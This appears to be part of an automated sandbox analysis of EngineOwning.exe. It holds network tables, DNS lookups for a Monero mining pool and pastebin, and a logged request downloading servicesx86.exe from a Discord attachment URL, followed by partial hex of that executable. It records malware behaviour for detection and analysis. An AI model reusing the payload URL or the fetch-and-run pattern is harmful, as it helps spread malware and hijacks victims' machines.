                                                                              Apr 26, 2022 21:08:56.417108059 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.417133093 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.417176962 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.417200089 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.417252064 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.417268038 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.417315006 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.417336941 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.417385101 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.417403936 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.417449951 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.417474031 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.417526007 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.417541981 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.417587996 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.417609930 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.417654991 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.417675972 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.417722940 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.417742014 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.417788982 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.417809963 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.417865038 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.417881012 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.417941093 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.417954922 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.418001890 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.418035030 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.418081999 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.418111086 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.418210983 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.432171106 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.432295084 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.432382107 CEST44349744162.159.129.233192.168.2.5
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Apr 26, 2022 21:08:55.550416946 CEST5432253192.168.2.58.8.8.8
                                                                              Apr 26, 2022 21:08:55.574134111 CEST53543228.8.8.8192.168.2.5
                                                                              Apr 26, 2022 21:10:59.673046112 CEST5251153192.168.2.58.8.8.8
                                                                              Apr 26, 2022 21:10:59.695593119 CEST53525118.8.8.8192.168.2.5
                                                                              Apr 26, 2022 21:11:00.681626081 CEST5675453192.168.2.58.8.8.8
                                                                              Apr 26, 2022 21:11:00.703701019 CEST53567548.8.8.8192.168.2.5
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                              Apr 26, 2022 21:08:55.550416946 CEST192.168.2.58.8.8.80xe51cStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:10:59.673046112 CEST192.168.2.58.8.8.80xef73Standard query (0)xmr-eu1.nanopool.orgA (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:11:00.681626081 CEST192.168.2.58.8.8.80x462dStandard query (0)pastebin.comA (IP address)IN (0x0001)
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                              Apr 26, 2022 21:08:55.574134111 CEST8.8.8.8192.168.2.50xe51cNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:08:55.574134111 CEST8.8.8.8192.168.2.50xe51cNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:08:55.574134111 CEST8.8.8.8192.168.2.50xe51cNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:08:55.574134111 CEST8.8.8.8192.168.2.50xe51cNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:08:55.574134111 CEST8.8.8.8192.168.2.50xe51cNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:10:59.695593119 CEST8.8.8.8192.168.2.50xef73No error (0)xmr-eu1.nanopool.org51.15.54.102A (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:10:59.695593119 CEST8.8.8.8192.168.2.50xef73No error (0)xmr-eu1.nanopool.org51.15.65.182A (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:10:59.695593119 CEST8.8.8.8192.168.2.50xef73No error (0)xmr-eu1.nanopool.org51.15.58.224A (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:10:59.695593119 CEST8.8.8.8192.168.2.50xef73No error (0)xmr-eu1.nanopool.org51.68.137.66A (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:10:59.695593119 CEST8.8.8.8192.168.2.50xef73No error (0)xmr-eu1.nanopool.org135.125.238.108A (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:10:59.695593119 CEST8.8.8.8192.168.2.50xef73No error (0)xmr-eu1.nanopool.org51.255.34.118A (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:10:59.695593119 CEST8.8.8.8192.168.2.50xef73No error (0)xmr-eu1.nanopool.org51.15.78.68A (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:10:59.695593119 CEST8.8.8.8192.168.2.50xef73No error (0)xmr-eu1.nanopool.org51.68.143.81A (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:10:59.695593119 CEST8.8.8.8192.168.2.50xef73No error (0)xmr-eu1.nanopool.org51.15.69.136A (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:10:59.695593119 CEST8.8.8.8192.168.2.50xef73No error (0)xmr-eu1.nanopool.org46.105.31.147A (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:10:59.695593119 CEST8.8.8.8192.168.2.50xef73No error (0)xmr-eu1.nanopool.org217.182.169.148A (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:10:59.695593119 CEST8.8.8.8192.168.2.50xef73No error (0)xmr-eu1.nanopool.org51.83.33.228A (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:11:00.703701019 CEST8.8.8.8192.168.2.50x462dNo error (0)pastebin.com172.67.34.170A (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:11:00.703701019 CEST8.8.8.8192.168.2.50x462dNo error (0)pastebin.com104.20.68.143A (IP address)IN (0x0001)
                                                                              Apr 26, 2022 21:11:00.703701019 CEST8.8.8.8192.168.2.50x462dNo error (0)pastebin.com104.20.67.143A (IP address)IN (0x0001)
                                                                              • cdn.discordapp.com
                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              0192.168.2.549744162.159.129.233443C:\Users\user\Desktop\EngineOwning.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              2022-04-26 19:08:56 UTC0OUTGET /attachments/935712720827842614/968101824034898000/servicesx86.exe HTTP/1.1
                                                                              Accept: */*
                                                                              UA-CPU: AMD64
                                                                              Accept-Encoding: gzip, deflate
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                              Host: cdn.discordapp.com
                                                                              Connection: Keep-Alive
                                                                              2022-04-26 19:08:56 UTC0INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Apr 2022 19:08:56 GMT
                                                                              Content-Type: application/x-msdos-program
                                                                              Content-Length: 4442624
                                                                              Connection: close
                                                                              CF-Ray: 70219c24586790d6-FRA
                                                                              Accept-Ranges: bytes
                                                                              Age: 70818
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Disposition: attachment;%20filename=servicesx86.exe
                                                                              ETag: "108368196293017a706ade912f519495"
                                                                              Expires: Wed, 26 Apr 2023 19:08:56 GMT
                                                                              Last-Modified: Mon, 25 Apr 2022 10:51:01 GMT
                                                                              CF-Cache-Status: HIT
                                                                              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                              x-goog-generation: 1650883861419853
                                                                              x-goog-hash: crc32c=iMrPyg==
                                                                              x-goog-hash: md5=EINoGWKTAXpwat6RL1GUlQ==
                                                                              x-goog-metageneration: 1
                                                                              x-goog-storage-class: STANDARD
                                                                              x-goog-stored-content-encoding: identity
                                                                              x-goog-stored-content-length: 4442624
                                                                              X-GUploader-UploadID: ADPycdthC5KEBYBPaE_INdqQD4Eyz4JtvPrF_V-asScdqp4sTxnzIxfQiYoA8DrFlitIuF_xklLtt9q2hHvD7r5JvCvlNKMI-abS
                                                                              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GwJSmKtdjNiu3fhicHQ0Cd45fmv5ThMlgfmSonHwPCvuPmiPFdjcdJEy2nRbBNDNiWt45X0h5htdceBRRT0zb0mjHMQ7XUJmrV48q%2F3%2FmgdDoczl3kLOotHr1S18jqhbURybpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              2022-04-26 19:08:56 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                              Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                              2022-04-26 19:08:56 UTC1INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 a0 7a 66 62 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 ae 00 00 00 18 43 00 00 00 00 00 00 00 00 00 00 40 43 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 44 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdzfb"C@C@ D@@@
                                                                              2022-04-26 19:08:56 UTC3INData Raw: 99 da 2b f2 a3 16 b3 92 38 97 cd 5a f6 92 91 14 2a e3 7c 39 de fa 0a f3 21 30 79 6c e1 1b 82 19 ff 29 59 78 7f 76 7b 7e ae 85 a6 bf 91 db 03 7b 34 51 d8 ee 6b 5f 1d 7c 7b 2c 1f 5d 26 76 7d 57 85 3d 34 a3 b4 f7 18 35 dc 1a 9f 9f fa d0 fe 9a dc 29 eb a9 cc f9 f8 85 35 b4 c5 88 d2 12 f4 58 c8 03 64 e9 bb 60 70 32 69 75 1f e7 8a 90 66 17 d5 cc b2 2b d9 56 e3 c1 a5 f2 f3 fe 06 0d 71 51 44 14 61 f5 70 3f e2 1a e5 7c 97 c0 a8 a4 a5 5f df 2e 7f 48 1f 82 65 4b 2a f5 17 9b 6b e8 35 c3 34 6a d0 e8 ed 3b 3d e8 0c 56 d3 a6 dc 3d 4b df 23 0d 12 b3 66 b8 e5 bf fc 22 86 d6 f4 ba 95 46 da cf 52 72 0c d1 f0 03 1f 6b c6 67 5c ff c2 e3 4b c7 8b 03 7f 79 8e b5 73 7b 84 ef ef af de f4 f5 a3 f0 da 8e b9 96 51 86 42 39 b6 4d 77 09 14 59 4b 1d 08 f4 3e dd 96 8c ec 5e 5a 8c 1e 65
                                                                              Data Ascii: +8Z*|9!0yl)Yxv{~{4Qk_|{,]&v}W=45)5Xd`p2iuf+VqQDap?|_.HeK*k54j;=V=K#f"FRrkg\Kys{QB9MwYK>^Ze
                                                                              2022-04-26 19:08:56 UTC4INData Raw: 0c e2 cb 50 6b 56 d0 ff 17 9b 74 e4 f2 a6 da a7 b2 b2 ca 3f 01 e9 40 ca 82 dc e2 4a fd 88 8d 08 1f 48 ad 67 64 71 ef 60 80 91 7e 74 e1 c4 71 f2 a4 45 f0 24 d9 12 55 a3 9e 07 c8 f9 b4 8d 29 f2 5c de 06 f4 d3 b6 d6 c9 fd 31 2f 61 96 c8 76 91 1f 67 2e 92 da d2 7e 5a 1d 57 a5 91 17 0e 6e 1c e4 ca 3f 63 b6 76 12 6a 51 79 bd db 86 7c ed db 26 cb af 0b 45 a1 3c 5c 90 22 42 e7 23 33 34 83 c9 df bc b0 ad 18 88 ef e7 71 a5 2f 3f 89 f3 4e d6 b2 7e 7c 69 c5 b1 2f 23 2a 90 12 2d 06 b7 78 03 e6 fc 6a 0f c9 c3 a9 32 13 86 76 73 ad 9f 90 7d 10 6a 3d 05 ee 31 10 2e f3 d0 bb 3a a6 00 aa 82 fd 07 af 2c 44 97 ad be de 7a 5d cc 35 af 35 e7 a9 16 50 ae 78 d8 70 88 95 e1 03 c9 c7 91 4b ab e1 94 dd 6a 55 52 07 7a 5a e4 15 9b b4 e5 2a bd f3 70 4b d7 20 8c 96 b0 7c ff bd 56 d9 17
                                                                              Data Ascii: PkVt?@JHgdq`~tqE$U)\1/avg.~ZWn?cvjQy|&E<\"B#34q/?N~|i/#*-xj2vs}j=1.:,Dz]55PxpKjURzZ*pK |V
                                                                              2022-04-26 19:08:56 UTC5INData Raw: 17 41 11 c1 14 5f e2 7d 05 f1 cc 1d f4 20 fc c1 a5 97 2d 33 50 db 4a bc 3e cc 12 83 a2 e6 b7 7f 2d 33 51 f3 8d 47 2b 37 ba bb 03 3a ba c9 e2 a3 7d 4f 2c 6a 57 a6 2f 1c 57 ca 6e 10 b4 06 65 b7 a1 cc a0 ed 06 61 d1 7a 6f 9a 9f b4 e0 df 55 17 f2 45 95 6b f2 01 3c 89 51 3e a0 bb 8d ba 01 6e 67 03 7a 0e 5e 66 9d 04 57 6a 40 a6 1c 9b 3a ec 82 ed de b3 a5 7e c8 58 80 20 c4 d9 0a cd ed 47 45 20 8f 02 35 da d4 a9 6d cb 62 1c 3a 96 9b 21 92 c7 56 c1 3a d5 0e b7 31 38 c2 5e b2 d9 3d b1 c6 a0 9c 9e 1b 60 42 36 90 78 a7 dc 71 86 77 86 89 dc 7c 40 e3 0d da dd 2a 9e a4 ac 37 a0 c0 71 6e b2 cc d1 9c 99 78 f2 3b 99 f4 be 2a 84 0a 25 36 3d 54 26 10 2d a1 9f fb 4d 51 d8 4d 15 b9 39 2e 49 80 2c 41 85 67 5b f8 1a c4 ad b7 ad e2 89 62 c3 97 35 83 89 63 32 d6 e2 39 26 c6 2f 45
                                                                              Data Ascii: A_} -3PJ>-3QG+7:}O,jW/WneazoUEk<Q>ngz^fWj@:~X GE 5mb:!V:18^=`B6xqw|@*7qnx;*%6=T&-MQM9.I,Ag[b5c29&/E
                                                                              2022-04-26 19:08:56 UTC7INData Raw: 01 4b 40 67 2d 8c 33 fc e8 b9 29 2d a0 02 66 81 85 57 58 02 0e c0 4f a0 ac cd 95 fe 34 ec cd 0d c5 9d a5 a9 d1 12 a2 15 22 ff a1 bc 6a bc d2 5c 5a 1c 9f 80 91 42 5c 34 b7 cf 18 00 34 8c ba 09 d0 5f b3 04 c9 ae 6c e3 6b f1 61 6a 10 96 16 70 d4 da 51 2e 91 15 b0 8e 47 35 ca 31 14 e1 60 11 4f 62 5e 67 3a f9 14 ae fa 87 9c e0 86 ee dd 5f 3e bd 3a 31 af f4 7c 85 fb 0d 0c c1 e2 85 d8 82 9b 6a b0 6a f2 48 a8 f8 2b 98 3f 44 1c 8d a9 68 8c 57 f6 88 37 39 6b fe 03 49 04 d8 e0 64 db 6d c8 db 36 65 16 ec 15 20 b3 1c e4 25 d1 a6 27 66 b3 42 f8 1f da d0 f4 03 c1 22 2b 32 cb aa 3f 97 27 be 2b db 22 43 b0 f4 d6 ff 6d e6 63 09 61 96 0f b1 b0 f4 b7 56 16 cf 84 f9 56 1e 56 76 9c ae 9d bd b3 cf 36 13 b9 fd 23 61 bd 32 b0 4c 0d b6 6a 54 79 48 8b 00 02 ea e5 5f 24 87 01 69 c6
                                                                              Data Ascii: K@g-3)-fWXO4"j\ZB\44_lkajpQ.G51`Ob^g:_>:1|jjH+?DhW79kIdm6e %'fB"+2?'+"CmcaVVVv6#a2LjTyH_$i
                                                                              2022-04-26 19:08:56 UTC8INData Raw: a6 9d 9f e0 d8 50 b9 90 f2 c8 a2 08 a4 27 c5 02 84 db 4d f1 d6 e8 1d 13 e8 b5 70 53 a3 d5 82 ea e4 e0 43 54 a4 33 85 56 7d c0 4a 06 f2 f5 9d 62 4f 41 5f 32 39 70 24 6e a3 2a 65 77 f6 cc 25 a5 bb d3 7f ab b5 5f 7b 19 69 84 0a 6b 59 e6 f9 c7 b2 30 89 03 4a fd 73 52 a7 88 9d 66 24 06 37 44 65 8f ee 56 51 b5 d2 7c 38 ff a5 4f dd e2 1d fb f6 09 4e cb 15 e5 3b ff 79 1a f1 93 ef 3b ca d4 d1 05 54 e9 65 0c 21 49 ca 62 5e ad d7 8e bb 62 3b 28 9f 33 fb 27 98 ba 16 78 97 c8 0d a6 a1 a9 2a 17 52 d2 dc 6f 0f 10 76 38 98 c3 b0 e6 c5 70 d8 c7 b2 1d 43 98 59 07 c1 6c c3 d2 88 e2 e1 eb bc ca ca b0 38 c6 2d 33 59 32 9a 1e e6 32 e0 5c bb 54 88 8a 71 ee cb 0f d6 ec 4b 32 bb 45 0e 07 d7 78 1d 66 8d 82 c4 fe e2 74 9d 99 c9 aa c9 58 f9 34 de e2 ca dc e0 6c 5b 07 6b 62 20 b1 c4
                                                                              Data Ascii: P'MpSCT3V}JbOA_29p$n*ew%_{ikY0JsRf$7DeVQ|8ON;y;Te!Ib^b;(3'x*Rov8pCYl8-3Y22\TqK2ExftX4l[kb
                                                                              2022-04-26 19:08:56 UTC9INData Raw: 2a 1b cf 50 80 58 6f 35 3e 48 1c ed 2a d0 39 cf d5 da 2e 5c 11 36 fa 85 7b a6 4c f5 26 6c fb 65 a6 41 7d 50 33 56 6e 8d 8e 3f 34 25 d0 d2 ac 75 45 ff 17 09 04 4a 81 dc 2f fa f6 57 b3 8c 3d e4 ca 7e 18 c2 13 3e 8e f8 dc 24 6e 42 a7 10 1c 5c 15 46 0f ec b3 86 1e eb f8 8a 59 5e fd d3 0f 7a b6 39 32 d7 f4 60 f3 57 69 81 24 ce da 1e a6 64 ad f7 75 3c cc 42 64 f5 d5 97 be 62 d0 da 2b 68 63 da ac 9e b7 52 ba ad 75 e2 1c 91 b7 4a fe aa ba e3 d5 59 80 8e 2b 3a be 46 6e 16 18 d4 6a f5 5e 30 2d 8f f4 47 fb a6 93 7d dd 32 e7 13 e7 68 00 15 88 a1 e9 84 d2 93 79 06 08 a1 ab 4b 8c e4 42 fc fa e4 47 71 73 17 73 97 12 fd cd 2d 64 84 aa 43 8e e7 c4 4c 0a 37 90 08 b0 29 bc d0 a6 f1 2b 4f f2 9e d3 6d e0 75 83 b7 98 7a c6 43 6d ca 3d 33 e6 b2 15 26 09 5f 5d 36 6d b5 ed e6 0e
                                                                              Data Ascii: *PXo5>H*9.\6{L&leA}P3Vn?4%uEJ/W=~>$nB\FY^z92`Wi$du<Bdb+hcRuJY+:Fnj^0-G}2hyKBGqss-dCL7)+OmuzCm=3&_]6m
                                                                              2022-04-26 19:08:56 UTC11INData Raw: 30 14 cb 58 bd 90 d7 08 af 54 3d 85 8d fe 04 e9 1b be 96 5b c8 5a 4d 3c f3 aa e8 7a f4 c5 95 21 6c b7 85 9a cc 74 4b db 15 be 76 99 f7 1e f1 dd 0d 84 ab 2a 24 e1 24 79 39 4c a0 e4 4f 19 fe dc 09 3a 94 a3 7a cd 29 76 58 1e 5f 8c 19 01 dd bf ce cc 42 03 dc d4 a2 d6 06 85 66 2e d2 56 fd 3b 25 5a dd fe c6 e9 dd e3 fa 8c c9 d1 34 03 d8 3f f3 84 3d aa a7 ca 8b 35 82 de 05 c2 1f e3 fa 97 8f d2 dd 8d 18 92 06 9b ca 0d 4a 3c b9 73 8a ac 60 ba 7a 4c 10 04 85 ec ed 2f b0 1e 09 93 c8 9b 4c 9b 29 61 48 67 55 f0 16 25 8d d9 25 47 d1 84 71 55 2e 31 cd 6c a1 20 b1 65 f7 b4 45 f0 e5 99 f5 48 05 e2 e2 73 19 3a 34 98 4f 5e d7 f2 ae ba f3 54 4a 8d 98 c2 e0 21 53 6d 22 2c 31 06 36 67 8c dd 9d 0d ab 9e 74 4c 3a c1 44 ce be d6 c8 6c fa 2b a8 49 ff ad 3d f6 8c c9 53 70 75 8f 03
                                                                              Data Ascii: 0XT=[ZM<z!ltKv*$$y9LO:z)vX_Bf.V;%Z4?=5J<s`zL/L)aHgU%%GqU.1l eEHs:4O^TJ!Sm",16gtL:Dl+I=Spu
                                                                              2022-04-26 19:08:56 UTC12INData Raw: 7b ad a1 f5 4a a4 0f 23 62 7c 65 67 d4 46 7d 93 55 30 d7 21 2f 6e 71 bd 84 df d1 0c 52 22 9d 0e e7 d3 52 9f 8c dc 93 27 ee c1 49 d3 c0 37 01 25 22 3d 50 26 eb 7e 5c bc 5a ee 95 ee 96 56 3a c3 71 0f c9 c0 61 ba 82 3d de 45 2e 80 2b 19 25 7c 6d fd d1 79 e5 f4 8f b6 42 ac 1b ce 0a 60 0b b3 0d 69 38 3b f6 da e5 a5 89 0a 2b af 29 74 dd 7d 4f 18 93 fb 73 12 68 7b c0 c4 90 3e e2 40 63 cf db df e5 f2 48 f9 5f b5 8c 9e 6a 31 7f 78 bf dd f1 03 e4 d3 6d 25 74 e7 05 5c 60 46 af 4d 53 55 5d 42 dc 1b d6 c6 8b 05 bd 14 08 27 86 49 62 7d c9 49 29 fc dd e8 43 a4 10 e7 11 f3 7d ec e1 f4 f9 65 e7 cd 17 46 27 1d 99 71 46 7d 3d e5 80 20 80 2e 66 02 71 12 35 3c 5e 70 54 8f cf 16 5c da 8e e6 43 df b0 d9 5c f8 98 7c 34 f6 53 e5 eb c7 18 52 d0 ef a3 49 81 07 fa b2 58 60 79 64 ba
                                                                              Data Ascii: {J#b|egF}U0!/nqR"R'I7%"=P&~\ZV:qa=E.+%|myB`i8;+)t}Osh{>@cH_j1xm%t\`FMSU]B'Ib}I)C}eF'qF}= .fq5<^pT\C\|4SRIX`yd
                                                                              2022-04-26 19:08:56 UTC13INData Raw: 07 2e 20 3f 64 3c d5 09 a0 e2 11 fb 25 63 02 d2 08 ee a9 1c a0 a1 db 9a ca 7c db c5 53 32 80 0a a8 d4 c5 7b ff 7c 4a 9f 64 2a 34 5c 1a 94 3c b3 5e d0 2d b2 94 57 c1 3d a8 82 2d 28 1c b3 ab db 8f 2e e3 cc ef 89 ee f1 6a aa b3 29 0f 15 29 0d 06 d6 eb 73 20 9f 86 9a 9d c0 eb 97 2a e3 ae 96 70 25 02 e1 6e 53 73 8c 01 06 27 ae 09 d3 30 49 72 59 6c 40 62 6e ef 4e a5 86 b8 f0 14 e8 c7 b9 c1 5f e0 69 fe a7 4e f2 22 fc 94 a9 bd 5d 0f bb fb eb 3a 92 d0 8e 58 5d 3c d3 18 51 ac a1 fe 15 dd 08 45 a5 81 b8 fa 58 f4 c5 a9 d5 a5 6e 2f c9 1c 80 e4 ef 38 43 2e fa 43 71 31 65 42 ed 81 96 8e 20 8d cb 46 24 4f 02 b3 4a dd 19 16 93 8d 08 7f fb 50 32 c3 67 6c 72 71 e2 38 13 d5 6b 6f d1 cc 54 1e b5 1e 99 79 4f 92 ed 98 51 0f 80 df 46 1f 8d 57 76 f0 9b 72 ee fa 70 d2 b1 7e 00 b5
                                                                              Data Ascii: . ?d<%c|S2{|Jd*4\<^-W=-(.j))s *p%nSs'0IrYl@bnN_iN"]:X]<QEXn/8C.Cq1eB F$OJP2glrq8koTyOQFWvrp~
                                                                              2022-04-26 19:08:56 UTC15INData Raw: 13 3a 6a ce 9b 00 4e 62 6d d5 7d 98 4a 84 9e b0 4b e2 28 56 d7 f6 83 68 34 78 8a 2c b8 c1 82 03 1c 4a 8f ff e7 a0 f8 cf c5 44 99 12 ab 70 d4 3d de cb 9d f8 7e f6 27 ff e4 1b 0d bf 6f 14 b7 d3 6a fb 62 e2 54 b7 1c 0a 38 a1 65 9e a7 12 73 0b 48 a0 e2 b4 9d 33 2d ea 04 ac b8 55 95 7a 96 97 f9 cc 3c df 5c 65 01 2b 04 83 f1 59 21 d0 80 7c 87 35 4e 51 b1 6a 3e 9e 8d 19 78 00 75 25 ff a0 5b b6 6b a1 ae 8f 92 a0 53 de 2a b8 24 03 17 de 50 13 e7 d4 b8 71 6d 16 9a 5e a6 18 cf a8 99 d5 99 5f 1e 7e 97 84 72 6b 15 95 4e 40 8b 4c e2 c1 e1 be 47 46 bf 4f d9 47 d0 02 9a 25 c0 df e6 77 56 ee bd e8 e4 d7 b5 e8 3b be 90 93 05 03 3b 87 d9 a9 62 c5 a5 cb 41 b9 fd 6f 3f 25 60 0b 4e b8 bc 5d 7c e9 ca 32 b2 63 cf ac 50 ba fa 8d 08 9e 7b ae 27 68 0f e2 bc 9f d5 e3 e0 37 e8 22 29
                                                                              Data Ascii: :jNbm}JK(Vh4x,JDp=~'ojbT8esH3-Uz<\e+Y!|5NQj>xu%[kS*$Pqm^_~rkN@LGFOG%wV;;bAo?%`N]|2cP{'h7")
                                                                              2022-04-26 19:08:56 UTC16INData Raw: 25 fc 76 11 87 98 ef 38 52 10 91 29 db 7b a7 31 02 ef 0e 2d 77 8a 74 12 a5 bb 98 7b 18 3e a9 52 47 3d 9d de 0b 83 81 09 6c 4b be 47 1b 69 1c e0 09 9f 29 7d 4f 7a 7e 6f 06 26 f9 84 47 e2 62 aa 2e c4 d2 86 df e9 2d eb 0f b9 f3 7d 48 82 d9 3f b3 b2 d3 38 39 c2 98 88 a5 b9 75 ff f6 d9 75 ef c2 c8 34 45 76 55 8d 6d cd dc 4f b0 ea b8 e3 57 2b df a6 25 3c bf 07 c4 65 2e af 34 22 eb dc 7f b0 e8 43 0e 25 df c4 65 79 4a f0 47 26 64 f3 00 3c ad 62 27 4c 07 f1 76 73 99 73 be 7d 6c e2 1c f0 3e 41 86 78 dc a3 50 76 72 06 85 1a 53 d5 e7 12 c6 9e d1 f7 cd e9 ba 7e da 9f 2e a4 5f 86 8b 0f de c7 9c c4 bb 42 35 af 4b bb 3a b5 6f 8c f5 1e 5e 25 99 97 10 7e b7 6c fd aa 62 86 e9 cc b6 ce 2e ac 1a f3 47 27 eb 8d 63 a0 6d 2b 81 4c b1 fd 4c 75 19 3b 32 68 92 15 b9 a0 16 1f e4 6b
                                                                              Data Ascii: %v8R){1-wt{>RG=lKGi)}Oz~o&Gb.-}H?89uu4EvUmOW+%<e.4"C%eyJG&d<b'Lvss}l>AxPvrS~._B5K:o^%~lb.G'cm+LLu;2hk
